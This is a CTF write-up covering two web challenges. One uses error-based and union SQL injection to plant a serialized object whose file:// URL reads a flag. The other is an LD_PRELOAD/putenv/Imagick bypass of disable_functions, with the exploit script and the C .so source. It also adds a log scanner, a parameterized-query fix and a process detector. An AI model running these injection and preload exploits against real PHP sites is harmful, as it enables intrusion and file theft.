Finally done with all the other stuff, time to start grinding challenges.

00x0 Wangding Cup: fakebook

The challenge has a registration page and a login page; after logging in you can see the information of the registered accounts.
Some quick fuzzing shows that if the statement is not closed properly at registration, PHP throws an error; then I found an injection point on the user-info view page.
Tried error-based injection and it was filtered; it turned out the filter was on 0x... Replacing the 0x in the updatexml payload with other characters works.
Successfully dumped the database name.

After that it is plain error-based injection.
Table name: users
Column names: no, username, passwd, data

I thought the injection part was over at this point,
but the data column turned out to be something like this:
So I tried using mid to extract the full string and see what data actually holds.
Then I ran into a curious situation:
the first character echoed back by updatexml cannot be a digit; if it is a digit, the echo comes back empty.
My approach was to take a two-character window at each offset, keep only the second character of each window, and prepend the first character of the string by hand (hoping there are no two digits in a row).
I'm lazy, so I wrote a script to run it.

import requests
import re

def requ(i):
    url = 'http://dc46bee2-e01b-427e-914e-b62f7b0a27d6.node3.buuoj.cn/view.php?no='
    # two-character window starting at offset i; only its second character is kept,
    # because updatexml returns nothing when the first echoed character is a digit
    payload = "6 and updatexml('~',concat(1,(select substr(group_concat(data),{},2) from users),'~'),2)".format(str(i))
    a = requests.get(url + payload)
    if a.status_code != 200:
        return requ(i)  # retry the same offset until the container answers
    # print(a.text)
    # print(re.findall(r"query error! \(XPATH syntax error: '(.*)~", a.text)[0][1:2])
    return re.findall(r"query error! \(XPATH syntax error: '(.*)~", a.text)[0][1:2]

a = 'O'  # first character of the serialized data, added by hand (it is never captured)
for i in range(1, 2000):
    a += requ(i)
    print(a)


It looks like there are still two adjacent digits somewhere, but it doesn't matter much, because the content is obviously what I wrote at registration...
Hmm, this second-order injection doesn't seem very useful.
So there should be a deserialization point; first I have to find the source.
robots.txt reveals /user.php.bak.
Let's open it and take a look:
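Turning the injection traces described above into detection logic: the following is an added example, not code from this post, that scans constructed web-server access-log lines (the IPs, timestamps and paths are made up; the payload shapes follow the ones in the write-up) and tags requests carrying updatexml/extractvalue error-based probes, union queries even when /**/ stands in for whitespace, hex literals, and PHP-serialized strings in the query. The log format and the signature list are my assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format); not captured from any real target.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2020:10:00:01 +0800] "GET /view.php?no=1 HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2020:10:00:07 +0800] "GET /view.php?no=6%20and%20updatexml('~',concat(1,(select%20substr(group_concat(data),1,2)%20from%20users),'~'),2) HTTP/1.1" 200 1203
10.0.0.9 - - [01/Jan/2020:10:00:09 +0800] "GET /view.php?no=0%20union/**/select%201,2,3,'O:8:%22UserInfo%22' HTTP/1.1" 200 540
10.0.0.9 - - [01/Jan/2020:10:00:11 +0800] "GET /view.php?no=1%20and%20extractvalue(1,concat(0x7e,database())) HTTP/1.1" 200 990
10.0.0.7 - - [01/Jan/2020:10:00:15 +0800] "GET /robots.txt HTTP/1.1" 200 33
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures are matched against the decoded, lower-cased, comment-stripped query string.
SIGNATURES = {
    "error-based": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "union": re.compile(r"\bunion\b[\s\S]*?\bselect\b"),
    "hex-literal": re.compile(r"\b0x[0-9a-f]+\b"),
    "serialized-php": re.compile(r'\bo:\d+:"'),
}


def normalise(query: str) -> str:
    """Decode and canonicalise a query string roughly the way the SQL engine sees it."""
    q = unquote_plus(query).lower()
    q = re.sub(r"/\*.*?\*/", " ", q)  # inline comments used as whitespace substitutes
    return re.sub(r"\s+", " ", q)


def classify(target: str) -> set:
    """Return the set of signature tags that fire on a request target."""
    query = urlsplit(target).query
    if not query:
        return set()
    q = normalise(query)
    return {tag for tag, rx in SIGNATURES.items() if rx.search(q)}


def scan_log(text: str) -> list:
    """Parse each log line and keep those whose query string matches at least one signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["target"])
        if tags:
            findings.append({"ip": m["ip"], "target": m["target"], "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["tags"], f["target"][:60])
```

The comment-stripping step is what makes the union/**/select variant visible; a signature applied to the raw URL would miss it, which is exactly the gap the challenge's own filter had.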

<?php

class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

A piece of source with no obvious purpose and no deserialization point.
The get method clearly has an SSRF, but the regex is fairly strict.
It seemed to have turned into an SSRF regex-bypass challenge.
Spent ages trying and still couldn't get past that regex check...
Later I sketched the database structure by hand and guessed that the backend probably looks up the data record by no; since there is an injection here, a union select can control the content of the serialized data.

0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:6:"ckj123";s:3:"age";i:111111;s:4:"blog";s:29:"file:///var/www/html/flag.php";} '

The no value in front of the union select must be one that does not exist, otherwise the real serialized row is returned.
The challenge has a filter; adding /**/ gets around it. What kind of regex is that?
Finally, the flag is in the base64 data of the data:// URI in the page source.
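As an added example (mine, not the challenge's actual view.php, whose code the page never shows), here is the lookup pattern that makes the union trick work and its fixed form, run against an in-memory SQLite database: string concatenation lets the page's union payload replace the data column, whereas an integer cast plus a bound parameter rejects it. It also covers the second lesson of this challenge, that isValidBlog's regex only helps if the URL is checked when it is fetched and not only when it is stored: blog_url_allowed is a hypothetical use-time check that allows only http(s) targets. Table layout follows the write-up; the sample rows are constructed.

```python
import re
import sqlite3
from urllib.parse import urlsplit

# Constructed legitimate record, in the same PHP-serialized shape as the challenge's data column.
SERIALIZED_OK = 'O:8:"UserInfo":3:{s:4:"name";s:5:"alice";s:3:"age";i:20;s:4:"blog";s:19:"http://example.com/";}'
# Attacker-controlled record injected through the union (shape taken from the write-up).
INJECTED = 'O:8:"UserInfo":3:{s:4:"name";s:3:"bob";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
UNION_PAYLOAD = "0 union/**/select 1,2,3,'" + INJECTED + "'"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (no INTEGER PRIMARY KEY, username TEXT, passwd TEXT, data TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'x', ?)", (SERIALIZED_OK,))
    conn.commit()
    return conn


def fetch_data_vulnerable(conn, no):
    """Assumed shape of the vulnerable lookup: `no` is pasted straight into the SQL text."""
    row = conn.execute(
        "SELECT no, username, passwd, data FROM users WHERE no = " + no
    ).fetchone()
    return row[3] if row else None


def fetch_data_safe(conn, no):
    """Hardened lookup: `no` must be an integer and travels as a bound parameter."""
    try:
        no_int = int(no)
    except (TypeError, ValueError):
        return None
    row = conn.execute(
        "SELECT no, username, passwd, data FROM users WHERE no = ?", (no_int,)
    ).fetchone()
    return row[3] if row else None


def extract_blog(data):
    """Pull the blog string out of a serialized UserInfo without unserializing it."""
    m = re.search(r's:4:"blog";s:\d+:"([^"]*)"', data or "")
    return m.group(1) if m else None


def blog_url_allowed(url):
    """Use-time check (hypothetical): only http(s) URLs with a host may be fetched."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


if __name__ == "__main__":
    conn = make_db()
    for fetch in (fetch_data_vulnerable, fetch_data_safe):
        data = fetch(conn, UNION_PAYLOAD)
        blog = extract_blog(data)
        print(fetch.__name__, "->", blog, "allowed:" , blog_url_allowed(blog) if blog else None)
```

Even if the lookup were left as it is, re-checking the blog URL inside getBlogContents() before calling curl would have stopped the file:// read; the regex in isValidBlog does reject that scheme, it just is not applied on the path that matters.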

00x1 Wallbreaker_Easy

Without looking things up I had absolutely no idea about this one - -
I have to admit I'm really not familiar with this area,
so I deliberately spent a lot of time reading all kinds of related material.
I'll write a separate summary of the principle later... (because I'm still fuzzy on it myself)
Just reproducing this one took a whole evening - - crashed seven or eight containers before it worked.
Exploit first:

import requests
import base64

url = "http://95c9ea66-c502-4c12-a3bd-26b8f62e9c14.node3.buuoj.cn"
dir = "/tmp/2873b3cf774fd7838702495c742ae2c0"
# PHP that drops the .so, sets LD_PRELOAD via putenv, and triggers Imagick so the
# library gets loaded into the spawned process; the base64 of the .so is omitted here
cmd = '''
<pre>hello???????<br><?php echo 'hello';?><br>
<?php
$dir = "{0}";
file_put_contents("{0}/P3rh4ps.so",base64_decode('<BASE64_OF_P3RH4PS_SO omitted>'));
putenv("LD_PRELOAD={0}/P3rh4ps.so");
file_put_contents("{0}/P3rh4ps.wmv","sssss");
$tocken = new Imagick('{0}/P3rh4ps.wmv');
?>
</pre>
'''.format(dir)

# write the PHP above to a file and include it
payload = '''
file_put_contents('%s/evil',base64_decode("%s"));
include "%s/evil";
''' % (dir, base64.b64encode(cmd.encode()).decode(), dir)

print(requests.post(url, data={'backdoor': payload}).content)

print(requests.post(url, data={'backdoor': "print_r(scandir('%s'));" % dir}).content)
print(requests.post(url, data={'backdoor': "echo file_get_contents('%s/P3rh4ps.txt');" % dir}).content)

The flow: first compile a .so on your own Linux box, get its base64 with PHP, and write it to the target;
then hijack the environment with putenv(LD_PRELOAD) and use Imagick to get the injected .so loaded;
finally, write all of the above into a PHP file and execute it with include.
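From the defender's side, the chain just described leaves a distinctive process signature: a child of the web worker starts with LD_PRELOAD pointing into a world-writable directory, and a shell then appears beneath that child (the constructor's system() call). The following added example, not part of the original post, runs such a rule over constructed process-creation events as an EDR or auditd consumer might see them; the event schema, the list of trusted library directories and the ffmpeg delegate name are my assumptions, and only the /tmp path is taken from the write-up.

```python
import os.path

# Library directories where a packaged preload is expected; anything else is suspect.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")
WEB_WORKERS = {"php-fpm", "apache2", "httpd"}
SHELLS = {"sh", "bash", "dash"}

# Constructed process-creation events (pid, ppid, command name, environment).
# ffmpeg is assumed to be the ImageMagick delegate spawned for the .wmv file.
SAMPLE_EVENTS = [
    {"pid": 3101, "ppid": 1,    "comm": "php-fpm", "env": {}},
    {"pid": 3188, "ppid": 3101, "comm": "ffmpeg",
     "env": {"LD_PRELOAD": "/tmp/2873b3cf774fd7838702495c742ae2c0/P3rh4ps.so"}},
    {"pid": 3190, "ppid": 3188, "comm": "sh", "env": {}},
    {"pid": 4000, "ppid": 3999, "comm": "python3",
     "env": {"LD_PRELOAD": "/usr/lib/x86_64-linux-gnu/libjemalloc.so.2"}},
]


def untrusted_preload(env):
    """Return the LD_PRELOAD entries that live outside the trusted library directories."""
    bad = []
    for lib in env.get("LD_PRELOAD", "").split(":"):
        if not lib:
            continue
        path = os.path.normpath(lib)  # defeats /tmp/../tmp/ style tricks
        if not path.startswith(TRUSTED_LIB_DIRS):
            bad.append(path)
    return bad


def ancestors(pid, by_pid):
    """Yield ancestor events by following ppid until the chain leaves the event set."""
    ev = by_pid.get(pid)
    hops = 0
    while ev is not None and hops < 64:
        ev = by_pid.get(ev["ppid"])
        if ev is None:
            return
        yield ev
        hops += 1


def detect(events):
    """Flag processes started with an untrusted preload and shells spawned beneath them."""
    by_pid = {e["pid"]: e for e in events}
    tainted = {e["pid"] for e in events if untrusted_preload(e["env"])}
    findings = []
    for ev in events:
        reasons = []
        chain = list(ancestors(ev["pid"], by_pid))
        if ev["pid"] in tainted:
            reasons.append("untrusted-preload")
            if any(a["comm"] in WEB_WORKERS for a in chain):
                reasons.append("descends-from-web-worker")
        if ev["comm"] in SHELLS and any(a["pid"] in tainted for a in chain):
            reasons.append("shell-after-preload")
        if reasons:
            findings.append((ev["pid"], sorted(reasons)))
    return findings


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(pid, reasons)
```

The jemalloc event is there on purpose: LD_PRELOAD by itself is common and benign, so the rule keys on where the library lives and what the parent is, not on the variable being set. On the prevention side, listing putenv in php.ini's disable_functions removes the primitive this chain depends on; the detection is a complement for hosts where that is not in place.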

The exploit kept returning 502 over and over; then I recompiled the .so and it inexplicably worked... thank heavens.
.so source:

#include <stdlib.h>
#include <stdio.h>
__attribute__ ((__constructor__)) void angel (void){
    system("/readflag > /tmp/2873b3cf774fd7838702495c742ae2c0/P3rh4ps.txt");
}

PHP file used to get the base64 value:

<?php
file_put_contents('1.txt',base64_encode(file_get_contents('P3rh4ps.so')));
?>

Doing challenges in Python is really nice - - for challenges with a complicated flow it cuts out a lot of repeated steps and saves time.

Category: Tech
